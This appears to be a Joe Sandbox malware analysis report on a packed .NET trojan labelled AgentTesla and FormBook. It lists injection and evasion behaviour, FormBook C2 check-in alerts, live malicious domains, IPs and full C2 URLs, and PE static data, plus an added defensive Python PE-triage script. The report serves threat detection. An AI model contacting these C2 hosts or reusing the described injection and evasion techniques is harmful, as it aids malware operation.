Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 562157 | Sample: triage_dropped_file | Start date: 28/01/2022 | Architecture: WINDOWS | Score: 100

Behavior graph (rendered figure replaced by its node and edge text):

Start
  DNS/IP: www.hstolchsjybyl.com
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 9 other signatures
  started: triage_dropped_file.exe 3
    Dropped: C:\Users\user\...\triage_dropped_file.exe.log, ASCII
    Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
    started: triage_dropped_file.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      injected: explorer.exe
        DNS/IP: www.inspectdecided.xyz 104.21.22.47, 49811, 80 CLOUDFLARENETUS United States; www.fengyat.club 188.114.96.7, 49818, 80 CLOUDFLARENETUS European Union
        Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation; Uses netsh to modify the Windows network and firewall settings
        started: netsh.exe
          Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          started: cmd.exe 1
            started: conhost.exe
        started: autofmt.exe

Source | Detection | Scanner | Label
triage_dropped_file.exe | 52% | Virustotal |
triage_dropped_file.exe | 22% | Metadefender |
triage_dropped_file.exe | 70% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
triage_dropped_file.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
Source | Detection | Scanner | Label
5.2.triage_dropped_file.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.triage_dropped_file.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.triage_dropped_file.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.triage_dropped_file.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
Source | Detection | Scanner | Label
www.fengyat.club | 3% | Virustotal |
www.hstolchsjybyl.com | 9% | Virustotal |
Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY | 100% | Avira URL Cloud | phishing
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.inspectdecided.xyz/a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw | 100% | Avira URL Cloud | malware
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
https://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
www.hstolchsjybyl.com/a83r/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.fengyat.club | 188.114.96.7 | true | true | | unknown
www.inspectdecided.xyz | 104.21.22.47 | true | true | | unknown
www.hstolchsjybyl.com | 81.17.29.148 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY | true | Avira URL Cloud: phishing | unknown
http://www.inspectdecided.xyz/a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw | true | Avira URL Cloud: malware | unknown
www.hstolchsjybyl.com/a83r/ | true | Avira URL Cloud: safe | low
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU | netsh.exe, 00000015.00000002.508497222.0000000003C2F000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | triage_dropped_file.exe, 00000000.00000002.287490322.00000000072D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.7 | www.fengyat.club | European Union | 13335 | CLOUDFLARENETUS | true
104.21.22.47 | www.inspectdecided.xyz | United States | 13335 | CLOUDFLARENETUS | true
                                Joe Sandbox Version:34.0.0 Boulder Opal
                                Analysis ID:562157
                                Start date:28.01.2022
                                Start time:15:15:49
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 11m 40s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:triage_dropped_file (renamed file extension from none to exe)
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@8/1@3/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:
                                • Successful, ratio: 24.5% (good quality ratio 22%)
                                • Quality average: 70.1%
                                • Quality standard deviation: 32.6%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, WerFault.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 20.54.104.15, 20.54.7.98, 40.91.112.76
                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
Time | Type | Description
15:17:02 | API Interceptor | 1x Sleep call for process: triage_dropped_file.exe modified
No context
                                Process:C:\Users\user\Desktop\triage_dropped_file.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.355304211458859
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.8138641927863715
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:triage_dropped_file.exe
                                File size:408064
                                MD5:f6eaacd1b39028130602ee0892e67663
                                SHA1:12ba0b4e8c41ececa29814f9b64da351e5509fb0
                                SHA256:1e144fefc15a6a2643674f01b3324e29b5320d45a16a081e8aad8a969712cb9d
                                SHA512:a5705ae52ffde84bbd90d6335f23ffccaccbde9b2e75d2462216662a60cf6a178a6a7f2b318975fd77d05ffc1746c357fc85c717fa2aa20cb480e452e9c5463b
                                SSDEEP:6144:h1hwO+Q45IX8LhyTa4eD9n1jMrOmm/jvXryE/74GoynY5vLyv97SnxQf8YdxvBWR:fLenxeOmm/j2Ub2M8YdByUHIgMv4rS
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..0...........N... ...`....@.. ....................................@................................
                                Icon Hash:00828e8e8686b000
                                Entrypoint:0x464eee
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x61F1E2DB [Thu Jan 27 00:10:03 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Entrypoint disassembly (0x464eee)
jmp dword ptr [00402000h]   ; 0x402000 = ImageBase 0x400000 + IAT RVA 0x2000, the single import slot (mscoree.dll!_CorExeMain); this is the standard managed-executable stub, all real code is CIL
add byte ptr [eax], al      ; repeated 97 times: the zero bytes that follow the stub decode as this instruction
Data Directories
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x64e9c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x66000          0x5e8         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x68000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x64d64          0x1c          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Sections
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x62ef4       0x63000   False     0.897399285827   data       7.82226086578   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x66000          0x5e8         0x600     False     0.427083333333   data       4.19707782727   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x68000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources
Name         RVA      Size   Type                                                                          Language  Country
RT_VERSION   0x66090  0x356  data
RT_MANIFEST  0x663f8  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Imports
DLL          Import
mscoree.dll  _CorExeMain
Version Infos
Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright Overwolf 2021
Assembly Version  11.0.0.0
InternalName      UCOMITypeL.exe
FileVersion       11.0.0.0
CompanyName       Overwolf LTD
LegalTrademarks
Comments
ProductName       Overwolf
ProductVersion    11.0.0.0
FileDescription   Overwolf
OriginalFilename  UCOMITypeL.exe
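Three static traits in the tables above separate this file from an ordinary managed executable: a CLR header (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR at RVA 0x2008), an entrypoint that is only `jmp dword ptr [00402000h]` through the one-slot IAT at RVA 0x2000 (the mscoree.dll!_CorExeMain import), and a .text section whose entropy of 7.82 sits close to the 8.0 ceiling, which for a .NET assembly means the CIL is mostly an encrypted or compressed blob that the stager decrypts at run time (the report's "Found potential string decryption / allocating functions" and the hollowed second copy of the process point the same way). The script below is an added example, not part of the Joe Sandbox report and not the sandbox's own parser. It reproduces those three checks with the Python standard library only. Because it has to run offline, it builds a small constructed PE32 image with the same layout (IAT at 0x2000, CLR header at 0x2008, the FF 25 stub, a flat-histogram .text, a near-empty .reloc); that image is not the sample on this page, and the 7.0 entropy cut-off is a chosen heuristic. `triage()` takes any PE32 file's bytes.

```python
"""Static triage of a PE32 image (stdlib only). Added example, not the report's parser.

build_sample_pe() constructs a demo image with the layout from the report's
static tables; pass any real PE32 file's bytes to triage() for the same checks.
"""
import math
import struct

IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA = 0x20, 0x40
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ = 0x20000000, 0x40000000
DIR_IAT, DIR_COM_DESCRIPTOR = 12, 14
ENTROPY_THRESHOLD = 7.0  # assumption: chosen cut-off for "looks encrypted/compressed"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for a flat histogram."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Parse DOS, COFF and PE32 optional headers, data directories and sections."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsections, timestamp, _, _, opt_size, _flags = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 images are handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsections):
        off = opt + opt_size + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        flags = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": name, "va": va, "vsize": vsize, "rawptr": rawptr,
                         "raw": data[rawptr:rawptr + rawsize], "flags": flags})
    return {"entry": entry, "image_base": image_base, "timestamp": timestamp,
            "dirs": dirs, "sections": sections}


def rva_to_offset(pe: dict, rva: int):
    """File offset backing an RVA, or None if no section maps it."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], len(s["raw"])):
            return s["rawptr"] + rva - s["va"]
    return None


def triage(data: bytes) -> list:
    """(rule, detail) findings for the three static traits the report shows."""
    pe = parse_pe(data)
    findings = []
    clr_rva, clr_size = pe["dirs"][DIR_COM_DESCRIPTOR]
    if clr_size:
        findings.append(("clr_header", f"CLR header at RVA {clr_rva:#x}: managed (.NET) image"))
    # FF 25 imm32 is `jmp dword ptr [imm32]`; in a managed image the slot is the
    # IAT entry the loader fills with mscoree!_CorExeMain.
    off = rva_to_offset(pe, pe["entry"])
    if off is not None and data[off:off + 2] == b"\xff\x25":
        slot = struct.unpack_from("<I", data, off + 2)[0] - pe["image_base"]
        iat_rva, iat_size = pe["dirs"][DIR_IAT]
        if iat_size and iat_rva <= slot < iat_rva + iat_size:
            findings.append(("clr_entry_stub", f"entry {pe['entry']:#x} jumps through IAT slot RVA {slot:#x}"))
    for s in pe["sections"]:
        ent = shannon_entropy(s["raw"])
        if s["flags"] & IMAGE_SCN_MEM_EXECUTE and ent > ENTROPY_THRESHOLD:
            findings.append(("high_entropy_code", f"{s['name']} entropy {ent:.2f}: embedded encrypted payload likely"))
    return findings


def build_sample_pe() -> bytes:
    """Constructed PE32 for the demo; it is not the sample on this page."""
    image_base, file_align, text_rva, text_ptr = 0x400000, 0x200, 0x2000, 0x200
    text = bytearray(8)                                     # IAT: one slot + terminator
    text += struct.pack("<I", 0x48) + bytes(0x44)           # CLR header, cb = 0x48
    entry_rva = text_rva + len(text)
    text += b"\xff\x25" + struct.pack("<I", image_base + text_rva)  # jmp dword ptr [0x402000]
    text += bytes(range(256)) * 16                          # stand-in for an encrypted blob
    text_raw = bytes(text).ljust(-(-len(text) // file_align) * file_align, b"\0")
    reloc_raw = (struct.pack("<II", 0x1000, 0xC) + bytes(4)).ljust(file_align, b"\0")
    opt = struct.pack("<HBB", 0x10B, 8, 0)
    opt += struct.pack("<IIIIIII", len(text_raw), len(reloc_raw), 0, entry_rva, text_rva, 0x4000, image_base)
    opt += struct.pack("<IIHHHHHHIIIIHHIIIIII", 0x1000, file_align, 4, 0, 0, 0, 4, 0, 0,
                       0x5000, 0x200, 0, 2, 0x8540, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[DIR_IAT], dirs[DIR_COM_DESCRIPTOR] = (text_rva, 8), (text_rva + 8, 0x48)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)

    def section(name, vsize, va, raw, ptr, flags):
        return name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", vsize, va, len(raw), ptr, 0, 0, 0, 0, flags)

    hdr = b"MZ" + bytes(58) + struct.pack("<I", 0x40) + b"PE\0\0"
    hdr += struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt), 0x0102) + opt
    hdr += section(b".text", len(text_raw), text_rva, text_raw, text_ptr,
                   IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    hdr += section(b".reloc", 0xC, 0x4000, reloc_raw, text_ptr + len(text_raw),
                   IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ)
    return hdr.ljust(text_ptr, b"\0") + text_raw + reloc_raw


if __name__ == "__main__":
    for rule, detail in triage(build_sample_pe()):
        print(f"[{rule}] {detail}")
```

On the real file the same three findings come back together with the 7.82 figure from the Sections table; a legitimately compiled .NET assembly shows the first two traits but its .text (CIL plus metadata) normally sits well below 7.0. Entropy alone is not proof of packing, which is why the check is restricted to executable sections and reported beside the CLR evidence rather than on its own.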
Snort IDS Alerts
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
01/28/22-15:18:16.875929  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49811        80         192.168.2.5  104.21.22.47
01/28/22-15:18:16.875929  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49811        80         192.168.2.5  104.21.22.47
01/28/22-15:18:16.875929  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49811        80         192.168.2.5  104.21.22.47
01/28/22-15:19:08.137491  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.5  81.17.29.148
01/28/22-15:19:08.137491  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.5  81.17.29.148
01/28/22-15:19:08.137491  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49820        80         192.168.2.5  81.17.29.148
TCP Packets
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Jan 28, 2022 15:18:16.858393908 CET  49811        80         192.168.2.5   104.21.22.47
Jan 28, 2022 15:18:16.875597000 CET  80           49811      104.21.22.47  192.168.2.5
Jan 28, 2022 15:18:16.875716925 CET  49811        80         192.168.2.5   104.21.22.47
Jan 28, 2022 15:18:16.875929117 CET  49811        80         192.168.2.5   104.21.22.47
Jan 28, 2022 15:18:16.892891884 CET  80           49811      104.21.22.47  192.168.2.5
Jan 28, 2022 15:18:16.932411909 CET  80           49811      104.21.22.47  192.168.2.5
Jan 28, 2022 15:18:16.932641029 CET  49811        80         192.168.2.5   104.21.22.47
Jan 28, 2022 15:18:16.932703972 CET  80           49811      104.21.22.47  192.168.2.5
Jan 28, 2022 15:18:16.932756901 CET  49811        80         192.168.2.5   104.21.22.47
Jan 28, 2022 15:18:16.949366093 CET  80           49811      104.21.22.47  192.168.2.5
Jan 28, 2022 15:18:47.885889053 CET  49818        80         192.168.2.5   188.114.96.7
Jan 28, 2022 15:18:47.903076887 CET  80           49818      188.114.96.7  192.168.2.5
Jan 28, 2022 15:18:47.903237104 CET  49818        80         192.168.2.5   188.114.96.7
Jan 28, 2022 15:18:47.903491020 CET  49818        80         192.168.2.5   188.114.96.7
Jan 28, 2022 15:18:47.920373917 CET  80           49818      188.114.96.7  192.168.2.5
Jan 28, 2022 15:18:47.942751884 CET  80           49818      188.114.96.7  192.168.2.5
Jan 28, 2022 15:18:47.942790031 CET  80           49818      188.114.96.7  192.168.2.5
Jan 28, 2022 15:18:47.942950010 CET  49818        80         192.168.2.5   188.114.96.7
Jan 28, 2022 15:18:47.943054914 CET  49818        80         192.168.2.5   188.114.96.7
Jan 28, 2022 15:18:47.959908962 CET  80           49818      188.114.96.7  192.168.2.5
UDP Packets
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Jan 28, 2022 15:18:16.805891991 CET  54791        53         192.168.2.5  8.8.8.8
Jan 28, 2022 15:18:16.841569901 CET  53           54791      8.8.8.8      192.168.2.5
Jan 28, 2022 15:18:47.860148907 CET  63732        53         192.168.2.5  8.8.8.8
Jan 28, 2022 15:18:47.884793043 CET  53           63732      8.8.8.8      192.168.2.5
Jan 28, 2022 15:19:08.085529089 CET  54450        53         192.168.2.5  8.8.8.8
Jan 28, 2022 15:19:08.116527081 CET  53           54450      8.8.8.8      192.168.2.5
DNS Queries
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                    Type            Class
